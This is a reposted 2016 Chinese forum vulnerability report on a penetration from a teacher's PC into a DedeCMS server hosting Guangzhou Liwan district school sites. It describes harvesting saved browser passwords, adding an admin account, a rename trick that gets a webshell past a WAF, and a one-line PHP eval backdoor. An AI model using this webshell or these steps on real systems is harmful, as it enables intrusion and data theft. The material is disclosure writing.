HanDs
管理员

[7月漏洞公开] 从对学校的渗透测试到控制广州市荔湾区所有学校官网 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

RT 求不走小厂流程

详细说明:

漏洞接 http://**.**.**.**/bugs/wooyun-2016-0210607

在内网渗透测试过程中,发现了一个IP地址,是老师的电脑



QQ截图20160520182840.jpg





找了个非办公时间,电脑居然还开着,进去一探究竟【发洞截图时老师在只能随便截一张了】



这台电脑上面的傲游浏览器保存了许多密码...发现一个学校的官网~



QQ截图20160520191524.jpg





还保存了路径,登录发现权限很大,直接先加一个管理吧~



QQ截图20160520191659.jpg





既然是dedecms,直接文件管理器传shell,发现被加速乐拦截了,于是改名大法好先传txt上去,然后改名即可。



QQ截图20160520191815.jpg





(图上的是我在之前测试过程中留下的shell没删)



既然知道有加速乐,那就要绕过,简单地用 <?php eval($_SERVER["HTTP_ACCEPT_CHARSET"]);?> 就可以执行命令了



QQ截图20160520192001.jpg





那么来获取一下真实ip



QQ截图20160520194938.jpg





改hosts,传一句话,菜刀连接



QQ截图20160520195202.jpg





来到www目录下看一看



QQ截图20160520195251.jpg





一堆荔湾的中小学还有幼儿园躺枪~



然后看一下数据库,信息位于/data/common.inc.php



QQ截图20160520195429.jpg





QQ截图20160520195540.jpg





数据库都在这里啦~就不继续深入了~

漏洞证明:

QQ截图20160520195251.jpg





QQ截图20160520195540.jpg

修复方案:

我也不知道~


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
从对 学校 渗透 测试 控制 广州市 所有 学校
#1楼
发帖时间:2016-7-6   |   查看数:0   |   回复数:0
游客组
快速回复